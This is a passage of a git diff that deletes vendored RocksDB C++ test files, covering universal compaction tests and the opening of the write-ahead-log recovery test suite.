-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-
-  // (1, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1,1,4) -> (2, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 2, 4) -> (3, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(2, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  // (1, 3, 4) -> (8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  // (1, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 1, 8) -> (2, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 2, 8) -> (3, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(2, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  // (1, 3, 8) -> (4, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(2, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  // (1, 4, 8) -> (5, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(2, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Reopen(options);
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Destroy(options);
-}
-
-TEST_P(DBTestUniversalCompaction, FullCompactionInBottomPriThreadPool) {
-  const int kNumFilesTrigger = 3;
-  Env::Default()->SetBackgroundThreads(1, Env::Priority::BOTTOM);
-  for (bool allow_ingest_behind : {false, true}) {
-    Options options = CurrentOptions();
-    options.allow_ingest_behind = allow_ingest_behind;
-    options.compaction_style = kCompactionStyleUniversal;
-    options.num_levels = num_levels_;
-    options.write_buffer_size = 100 << 10;     // 100KB
-    options.target_file_size_base = 32 << 10;  // 32KB
-    options.level0_file_num_compaction_trigger = kNumFilesTrigger;
-    // Trigger compaction if size amplification exceeds 110%
-    options.compaction_options_universal.max_size_amplification_percent = 110;
-    DestroyAndReopen(options);
-
-    int num_bottom_pri_compactions = 0;
-    SyncPoint::GetInstance()->SetCallBack(
-        "DBImpl::BGWorkBottomCompaction",
-        [&](void* arg) { ++num_bottom_pri_compactions; });
-    SyncPoint::GetInstance()->EnableProcessing();
-
-    Random rnd(301);
-    for (int num = 0; num < kNumFilesTrigger; num++) {
-      ASSERT_EQ(NumSortedRuns(), num);
-      int key_idx = 0;
-      GenerateNewFile(&rnd, &key_idx);
-    }
-    dbfull()->TEST_WaitForCompact();
-
-    if (allow_ingest_behind || num_levels_ > 1) {
-      // allow_ingest_behind increases number of levels while sanitizing.
-      ASSERT_EQ(1, num_bottom_pri_compactions);
-    } else {
-      // for single-level universal, everything's bottom level so nothing should
-      // be executed in bottom-pri thread pool.
-      ASSERT_EQ(0, num_bottom_pri_compactions);
-    }
-    // Verify that size amplification did occur
-    ASSERT_EQ(NumSortedRuns(), 1);
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  }
-  Env::Default()->SetBackgroundThreads(0, Env::Priority::BOTTOM);
-}
-
-TEST_P(DBTestUniversalCompaction, ConcurrentBottomPriLowPriCompactions) {
-  if (num_levels_ == 1) {
-    // for single-level universal, everything's bottom level so nothing should
-    // be executed in bottom-pri thread pool.
-    return;
-  }
-  const int kNumFilesTrigger = 3;
-  Env::Default()->SetBackgroundThreads(1, Env::Priority::BOTTOM);
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = num_levels_;
-  options.write_buffer_size = 100 << 10;     // 100KB
-  options.target_file_size_base = 32 << 10;  // 32KB
-  options.level0_file_num_compaction_trigger = kNumFilesTrigger;
-  // Trigger compaction if size amplification exceeds 110%
-  options.compaction_options_universal.max_size_amplification_percent = 110;
-  DestroyAndReopen(options);
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {// wait for the full compaction to be picked before adding files intended
-       // for the second one.
-       {"DBImpl::BackgroundCompaction:ForwardToBottomPriPool",
-        "DBTestUniversalCompaction:ConcurrentBottomPriLowPriCompactions:0"},
-       // the full (bottom-pri) compaction waits until a partial (low-pri)
-       // compaction has started to verify they can run in parallel.
-       {"DBImpl::BackgroundCompaction:NonTrivial",
-        "DBImpl::BGWorkBottomCompaction"}});
-  SyncPoint::GetInstance()->EnableProcessing();
-
-  Random rnd(301);
-  for (int i = 0; i < 2; ++i) {
-    for (int num = 0; num < kNumFilesTrigger; num++) {
-      int key_idx = 0;
-      GenerateNewFile(&rnd, &key_idx, true /* no_wait */);
-      // use no_wait above because that one waits for flush and compaction. We
-      // don't want to wait for compaction because the full compaction is
-      // intentionally blocked while more files are flushed.
-      dbfull()->TEST_WaitForFlushMemTable();
-    }
-    if (i == 0) {
-      TEST_SYNC_POINT(
-          "DBTestUniversalCompaction:ConcurrentBottomPriLowPriCompactions:0");
-    }
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  // First compaction should output to bottom level. Second should output to L0
-  // since older L0 files pending compaction prevent it from being placed lower.
-  ASSERT_EQ(NumSortedRuns(), 2);
-  ASSERT_GT(NumTableFilesAtLevel(0), 0);
-  ASSERT_GT(NumTableFilesAtLevel(num_levels_ - 1), 0);
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  Env::Default()->SetBackgroundThreads(0, Env::Priority::BOTTOM);
-}
-
-TEST_P(DBTestUniversalCompaction, RecalculateScoreAfterPicking) {
-  // Regression test for extra compactions scheduled. Once enough compactions
-  // have been scheduled to bring the score below one, we should stop
-  // scheduling more; otherwise, other CFs/DBs may be delayed unnecessarily.
-  const int kNumFilesTrigger = 8;
-  Options options = CurrentOptions();
-  options.compaction_options_universal.max_merge_width = kNumFilesTrigger / 2;
-  options.compaction_options_universal.max_size_amplification_percent =
-      static_cast<unsigned int>(-1);
-  options.compaction_style = kCompactionStyleUniversal;
-  options.level0_file_num_compaction_trigger = kNumFilesTrigger;
-  options.num_levels = num_levels_;
-  options.write_buffer_size = 100 << 10;  // 100KB
-  Reopen(options);
-
-  std::atomic<int> num_compactions_attempted(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:Start", [&](void* arg) {
-        ++num_compactions_attempted;
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Random rnd(301);
-  for (int num = 0; num < kNumFilesTrigger; num++) {
-    ASSERT_EQ(NumSortedRuns(), num);
-    int key_idx = 0;
-    GenerateNewFile(&rnd, &key_idx);
-  }
-  dbfull()->TEST_WaitForCompact();
-  // Compacting the first four files was enough to bring the score below one so
-  // there's no need to schedule any more compactions.
-  ASSERT_EQ(1, num_compactions_attempted);
-  ASSERT_EQ(NumSortedRuns(), 5);
-}
-
-INSTANTIATE_TEST_CASE_P(UniversalCompactionNumLevels, DBTestUniversalCompaction,
-                        ::testing::Combine(::testing::Values(1, 3, 5),
-                                           ::testing::Bool()));
-
-class DBTestUniversalManualCompactionOutputPathId
-    : public DBTestUniversalCompactionBase {
- public:
-  DBTestUniversalManualCompactionOutputPathId() :
-      DBTestUniversalCompactionBase(
-          "/db_universal_compaction_manual_pid_test") {}
-};
-
-TEST_P(DBTestUniversalManualCompactionOutputPathId,
-       ManualCompactionOutputPathId) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.db_paths.emplace_back(dbname_, 1000000000);
-  options.db_paths.emplace_back(dbname_ + "_2", 1000000000);
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = num_levels_;
-  options.target_file_size_base = 1 << 30;  // Big size
-  options.level0_file_num_compaction_trigger = 10;
-  Destroy(options);
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-  MakeTables(3, "p", "q", 1);
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ(2, TotalLiveFiles(1));
-  ASSERT_EQ(2, GetSstFileCount(options.db_paths[0].path));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[1].path));
-
-  // Full compaction to DB path 0
-  CompactRangeOptions compact_options;
-  compact_options.target_path_id = 1;
-  compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-  db_->CompactRange(compact_options, handles_[1], nullptr, nullptr);
-  ASSERT_EQ(1, TotalLiveFiles(1));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[0].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-
-  ReopenWithColumnFamilies({kDefaultColumnFamilyName, "pikachu"}, options);
-  ASSERT_EQ(1, TotalLiveFiles(1));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[0].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-
-  MakeTables(1, "p", "q", 1);
-  ASSERT_EQ(2, TotalLiveFiles(1));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[0].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-
-  ReopenWithColumnFamilies({kDefaultColumnFamilyName, "pikachu"}, options);
-  ASSERT_EQ(2, TotalLiveFiles(1));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[0].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-
-  // Full compaction to DB path 0
-  compact_options.target_path_id = 0;
-  compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-  db_->CompactRange(compact_options, handles_[1], nullptr, nullptr);
-  ASSERT_EQ(1, TotalLiveFiles(1));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[0].path));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[1].path));
-
-  // Fail when compacting to an invalid path ID
-  compact_options.target_path_id = 2;
-  compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-  ASSERT_TRUE(db_->CompactRange(compact_options, handles_[1], nullptr, nullptr)
-                  .IsInvalidArgument());
-}
-
-INSTANTIATE_TEST_CASE_P(DBTestUniversalManualCompactionOutputPathId,
-                        DBTestUniversalManualCompactionOutputPathId,
-                        ::testing::Combine(::testing::Values(1, 8),
-                                           ::testing::Bool()));
-
-}  // namespace rocksdb
-
-#endif  // !defined(ROCKSDB_LITE)
-
-int main(int argc, char** argv) {
-#if !defined(ROCKSDB_LITE)
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-#else
-  return 0;
-#endif
-}
diff --git a/thirdparty/rocksdb/db/db_wal_test.cc b/thirdparty/rocksdb/db/db_wal_test.cc
deleted file mode 100644
index 461fe46..0000000
--- a/thirdparty/rocksdb/db/db_wal_test.cc
+++ /dev/null
@@ -1,1229 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_test_util.h"
-#include "options/options_helper.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "util/fault_injection_test_env.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-class DBWALTest : public DBTestBase {
- public:
-  DBWALTest() : DBTestBase("/db_wal_test") {}
-};
-
-TEST_F(DBWALTest, WAL) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    WriteOptions writeOpt = WriteOptions();
-    writeOpt.disableWAL = true;
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "foo", "v1"));
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "bar", "v1"));
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_EQ("v1", Get(1, "bar"));
-
-    writeOpt.disableWAL = false;
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "bar", "v2"));
-    writeOpt.disableWAL = true;
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "foo", "v2"));
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    // Both value's should be present.
-    ASSERT_EQ("v2", Get(1, "bar"));
-    ASSERT_EQ("v2", Get(1, "foo"));
-
-    writeOpt.disableWAL = true;
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "bar", "v3"));
-    writeOpt.disableWAL = false;
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "foo", "v3"));
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    // again both values should be present.
-    ASSERT_EQ("v3", Get(1, "foo"));
-    ASSERT_EQ("v3", Get(1, "bar"));
-  } while (ChangeWalOptions());
-}
-
-TEST_F(DBWALTest, RollLog) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_OK(Put(1, "baz", "v5"));
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    for (int i = 0; i < 10; i++) {
-      ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    }
-    ASSERT_OK(Put(1, "foo", "v4"));
-    for (int i = 0; i < 10; i++) {
-      ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    }
-  } while (ChangeWalOptions());
-}
-
-TEST_F(DBWALTest, SyncWALNotBlockWrite) {
-  Options options = CurrentOptions();
-  options.max_write_buffer_number = 4;
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put("foo1", "bar1"));
-  ASSERT_OK(Put("foo5", "bar5"));
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"WritableFileWriter::SyncWithoutFlush:1",
-       "DBWALTest::SyncWALNotBlockWrite:1"},
-      {"DBWALTest::SyncWALNotBlockWrite:2",
-       "WritableFileWriter::SyncWithoutFlush:2"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rocksdb::port::Thread thread([&]() { ASSERT_OK(db_->SyncWAL()); });
-
-  TEST_SYNC_POINT("DBWALTest::SyncWALNotBlockWrite:1");
-  ASSERT_OK(Put("foo2", "bar2"));
-  ASSERT_OK(Put("foo3", "bar3"));
-  FlushOptions fo;
-  fo.wait = false;
-  ASSERT_OK(db_->Flush(fo));
-  ASSERT_OK(Put("foo4", "bar4"));
-
-  TEST_SYNC_POINT("DBWALTest::SyncWALNotBlockWrite:2");
-
-  thread.join();
-
-  ASSERT_EQ(Get("foo1"), "bar1");
-  ASSERT_EQ(Get("foo2"), "bar2");
-  ASSERT_EQ(Get("foo3"), "bar3");
-  ASSERT_EQ(Get("foo4"), "bar4");
-  ASSERT_EQ(Get("foo5"), "bar5");
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBWALTest, SyncWALNotWaitWrite) {
-  ASSERT_OK(Put("foo1", "bar1"));
-  ASSERT_OK(Put("foo3", "bar3"));
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"SpecialEnv::WalFile::Append:1", "DBWALTest::SyncWALNotWaitWrite:1"},
-      {"DBWALTest::SyncWALNotWaitWrite:2", "SpecialEnv::WalFile::Append:2"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rocksdb::port::Thread thread([&]() { ASSERT_OK(Put("foo2", "bar2")); });
-  // Moving this to SyncWAL before the actual fsync
-  // TEST_SYNC_POINT("DBWALTest::SyncWALNotWaitWrite:1");
-  ASSERT_OK(db_->SyncWAL());
-  // Moving this to SyncWAL after actual fsync
-  // TEST_SYNC_POINT("DBWALTest::SyncWALNotWaitWrite:2");
-
-  thread.join();
-
-  ASSERT_EQ(Get("foo1"), "bar1");
-  ASSERT_EQ(Get("foo2"), "bar2");
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBWALTest, Recover) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_OK(Put(1, "baz", "v5"));
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_EQ("v1", Get(1, "foo"));
-
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_EQ("v5", Get(1, "baz"));
-    ASSERT_OK(Put(1, "bar", "v2"));
-    ASSERT_OK(Put(1, "foo", "v3"));
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_EQ("v3", Get(1, "foo"));
-    ASSERT_OK(Put(1, "foo", "v4"));
-    ASSERT_EQ("v4", Get(1, "foo"));
-    ASSERT_EQ("v2", Get(1, "bar"));
-    ASSERT_EQ("v5", Get(1, "baz"));
-  } while (ChangeWalOptions());
-}
-
-TEST_F(DBWALTest, RecoverWithTableHandle) {
-  do {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.disable_auto_compactions = true;
-    options.avoid_flush_during_recovery = false;
-    DestroyAndReopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_OK(Put(1, "bar", "v2"));
-    ASSERT_OK(Flush(1));
-    ASSERT_OK(Put(1, "foo", "v3"));
-    ASSERT_OK(Put(1, "bar", "v4"));
-    ASSERT_OK(Flush(1));
-    ASSERT_OK(Put(1, "big", std::string(100, 'a')));
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-
-    std::vector<std::vector<FileMetaData>> files;
-    dbfull()->TEST_GetFilesMetaData(handles_[1], &files);
-    size_t total_files = 0;
-    for (const auto& level : files) {
-      total_files += level.size();
-    }
-    ASSERT_EQ(total_files, 3);
-    for (const auto& level : files) {
-      for (const auto& file : level) {
-        if (kInfiniteMaxOpenFiles == option_config_) {
-          ASSERT_TRUE(file.table_reader_handle != nullptr);
-        } else {
-          ASSERT_TRUE(file.table_reader_handle == nullptr);
-        }
-      }
-    }
-  } while (ChangeWalOptions());
-}
-
-TEST_F(DBWALTest, IgnoreRecoveredLog) {
-  std::string backup_logs = dbname_ + "/backup_logs";
-
-  do {
-    // delete old files in backup_logs directory
-    env_->CreateDirIfMissing(backup_logs);
-    std::vector<std::string> old_files;
-    env_->GetChildren(backup_logs, &old_files);
-    for (auto& file : old_files) {
-      if (file != "." && file != "..") {
-        env_->DeleteFile(backup_logs + "/" + file);
-      }
-    }
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.merge_operator = MergeOperators::CreateUInt64AddOperator();
-    options.wal_dir = dbname_ + "/logs";
-    DestroyAndReopen(options);
-
-    // fill up the DB
-    std::string one, two;
-    PutFixed64(&one, 1);
-    PutFixed64(&two, 2);
-    ASSERT_OK(db_->Merge(WriteOptions(), Slice("foo"), Slice(one)));
-    ASSERT_OK(db_->Merge(WriteOptions(), Slice("foo"), Slice(one)));
-    ASSERT_OK(db_->Merge(WriteOptions(), Slice("bar"), Slice(one)));
-
-    // copy the logs to backup
-    std::vector<std::string> logs;
-    env_->GetChildren(options.wal_dir, &logs);
-    for (auto& log : logs) {
-      if (log != ".." && log != ".") {
-        CopyFile(options.wal_dir + "/" + log, backup_logs + "/" + log);
-      }
-    }
-
-    // recover the DB
-    Reopen(options);
-    ASSERT_EQ(two, Get("foo"));
-    ASSERT_EQ(one, Get("bar"));
-    Close();
-
-    // copy the logs from backup back to wal dir
-    for (auto& log : logs) {
-      if (log != ".." && log != ".") {
-        CopyFile(backup_logs + "/" + log, options.wal_dir + "/" + log);
-      }
-    }
-    // this should ignore the log files, recovery should not happen again
-    // if the recovery happens, the same merge operator would be called twice,
-    // leading to incorrect results
-    Reopen(options);
-    ASSERT_EQ(two, Get("foo"));
-    ASSERT_EQ(one, Get("bar"));
-    Close();
-    Destroy(options);
-    Reopen(options);
-    Close();
-
-    // copy the logs from backup back to wal dir
-    env_->CreateDirIfMissing(options.wal_dir);
-    for (auto& log : logs) {
-      if (log != ".." && log != ".") {
-        CopyFile(backup_logs + "/" + log, options.wal_dir + "/" + log);
-      }
-    }
-    // assert that we successfully recovered only from logs, even though we
-    // destroyed the DB
-    Reopen(options);
-    ASSERT_EQ(two, Get("foo"));
-    ASSERT_EQ(one, Get("bar"));
-
-    // Recovery will fail if DB directory doesn't exist.
-    Destroy(options);
-    // copy the logs from backup back to wal dir
-    env_->CreateDirIfMissing(options.wal_dir);
-    for (auto& log : logs) {
-      if (log != ".." && log != ".") {
-        CopyFile(backup_logs + "/" + log, options.wal_dir + "/" + log);
-        // we won't be needing this file no more
-        env_->DeleteFile(backup_logs + "/" + log);
-      }
-    }
-    Status s = TryReopen(options);
-    ASSERT_TRUE(!s.ok());
-    Destroy(options);
-  } while (ChangeWalOptions());
-}
-
-TEST_F(DBWALTest, RecoveryWithEmptyLog) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_OK(Put(1, "foo", "v2"));
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v3"));
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_EQ("v3", Get(1, "foo"));
-  } while (ChangeWalOptions());
-}
-
-#if !(defined NDEBUG) || !defined(OS_WIN)
-TEST_F(DBWALTest, PreallocateBlock) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 10 * 1000 * 1000;
-  options.max_total_wal_size = 0;
-
-  size_t expected_preallocation_size = static_cast<size_t>(
-      options.write_buffer_size + options.write_buffer_size / 10);
-
-  DestroyAndReopen(options);
-
-  std::atomic<int> called(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBTestWalFile.GetPreallocationStatus", [&](void* arg) {
-        ASSERT_TRUE(arg != nullptr);
-        size_t preallocation_size = *(static_cast<size_t*>(arg));
-        ASSERT_EQ(expected_preallocation_size, preallocation_size);
-        called.fetch_add(1);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  Put("", "");
-  Flush();
-  Put("", "");
-  Close();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_EQ(2, called.load());
-
-  options.max_total_wal_size = 1000 * 1000;
-  expected_preallocation_size = static_cast<size_t>(options.max_total_wal_size);
-  Reopen(options);
-  called.store(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBTestWalFile.GetPreallocationStatus", [&](void* arg) {
-        ASSERT_TRUE(arg != nullptr);
-        size_t preallocation_size = *(static_cast<size_t*>(arg));
-        ASSERT_EQ(expected_preallocation_size, preallocation_size);
-        called.fetch_add(1);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  Put("", "");
-  Flush();
-  Put("", "");
-  Close();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_EQ(2, called.load());
-
-  options.db_write_buffer_size = 800 * 1000;
-  expected_preallocation_size =
-      static_cast<size_t>(options.db_write_buffer_size);
-  Reopen(options);
-  called.store(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBTestWalFile.GetPreallocationStatus", [&](void* arg) {
-        ASSERT_TRUE(arg != nullptr);
-        size_t preallocation_size = *(static_cast<size_t*>(arg));
-        ASSERT_EQ(expected_preallocation_size, preallocation_size);
-        called.fetch_add(1);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  Put("", "");
-  Flush();
-  Put("", "");
-  Close();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_EQ(2, called.load());
-
-  expected_preallocation_size = 700 * 1000;
-  std::shared_ptr<WriteBufferManager> write_buffer_manager =
-      std::make_shared<WriteBufferManager>(static_cast<uint64_t>(700 * 1000));
-  options.write_buffer_manager = write_buffer_manager;
-  Reopen(options);
-  called.store(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBTestWalFile.GetPreallocationStatus", [&](void* arg) {
-        ASSERT_TRUE(arg != nullptr);
-        size_t preallocation_size = *(static_cast<size_t*>(arg));
-        ASSERT_EQ(expected_preallocation_size, preallocation_size);
-        called.fetch_add(1);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  Put("", "");
-  Flush();
-  Put("", "");
-  Close();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_EQ(2, called.load());
-}
-#endif  // !(defined NDEBUG) || !defined(OS_WIN)
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBWALTest, FullPurgePreservesRecycledLog) {
-  // For github issue #1303
-  for (int i = 0; i < 2; ++i) {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.recycle_log_file_num = 2;
-    if (i != 0) {
-      options.wal_dir = alternative_wal_dir_;
-    }
-
-    DestroyAndReopen(options);
-    ASSERT_OK(Put("foo", "v1"));
-    VectorLogPtr log_files;
-    ASSERT_OK(dbfull()->GetSortedWalFiles(log_files));
-    ASSERT_GT(log_files.size(), 0);
-    ASSERT_OK(Flush());
-
-    // Now the original WAL is in log_files[0] and should be marked for
-    // recycling.
-    // Verify full purge cannot remove this file.
-    JobContext job_context(0);
-    dbfull()->TEST_LockMutex();
-    dbfull()->FindObsoleteFiles(&job_context, true /* force */);
-    dbfull()->TEST_UnlockMutex();
-    dbfull()->PurgeObsoleteFiles(job_context);
-
-    if (i == 0) {
-      ASSERT_OK(
-          env_->FileExists(LogFileName(dbname_, log_files[0]->LogNumber())));
-    } else {
-      ASSERT_OK(env_->FileExists(
-          LogFileName(alternative_wal_dir_, log_files[0]->LogNumber())));
-    }
-  }
-}
-
-TEST_F(DBWALTest, GetSortedWalFiles) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    VectorLogPtr log_files;
-    ASSERT_OK(dbfull()->GetSortedWalFiles(log_files));
-    ASSERT_EQ(0, log_files.size());
-
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_OK(dbfull()->GetSortedWalFiles(log_files));
-    ASSERT_EQ(1, log_files.size());
-  } while (ChangeWalOptions());
-}
-
-TEST_F(DBWALTest, RecoveryWithLogDataForSomeCFs) {
-  // Test for regression of WAL cleanup missing files that don't contain data
-  // for every column family.
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_OK(Put(1, "foo", "v2"));
-    uint64_t earliest_log_nums[2];
-    for (int i = 0; i < 2; ++i) {
-      if (i > 0) {
-        ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-      }
-      VectorLogPtr log_files;
-      ASSERT_OK(dbfull()->GetSortedWalFiles(log_files));
-      if (log_files.size() > 0) {
-        earliest_log_nums[i] = log_files[0]->LogNumber();
-      } else {
-        earliest_log_nums[i] = port::kMaxUint64;
-      }
-    }
-    // Check at least the first WAL was cleaned up during the recovery.
-    ASSERT_LT(earliest_log_nums[0], earliest_log_nums[1]);
-  } while (ChangeWalOptions());
-}
-
-TEST_F(DBWALTest, RecoverWithLargeLog) {
-  do {
-    {
-      Options options = CurrentOptions();
-      CreateAndReopenWithCF({"pikachu"}, options);
-      ASSERT_OK(Put(1, "big1", std::string(200000, '1')));
-      ASSERT_OK(Put(1, "big2", std::string(200000, '2')));
-      ASSERT_OK(Put(1, "small3", std::string(10, '3')));
-      ASSERT_OK(Put(1, "small4", std::string(10, '4')));
-      ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-    }
-
-    // Make sure that if we re-open with a small write buffer size that
-    // we flush table files in the middle of a large log file.
-    Options options;
-    options.write_buffer_size = 100000;
-    options = CurrentOptions(options);
-    ReopenWithColumnFamilies({"default", "pikachu"}, options);
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), 3);
-    ASSERT_EQ(std::string(200000, '1'), Get(1, "big1"));
-    ASSERT_EQ(std::string(200000, '2'), Get(1, "big2"));
-    ASSERT_EQ(std::string(10, '3'), Get(1, "small3"));
-    ASSERT_EQ(std::string(10, '4'), Get(1, "small4"));
-    ASSERT_GT(NumTableFilesAtLevel(0, 1), 1);
-  } while (ChangeWalOptions());
-}
-
-// In https://reviews.facebook.net/D20661 we change
-// recovery behavior: previously for each log file each column family
-// memtable was flushed, even it was empty. Now it's changed:
-// we try to create the smallest number of table files by merging
-// updates from multiple logs
-TEST_F(DBWALTest, RecoverCheckFileAmountWithSmallWriteBuffer) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 5000000;
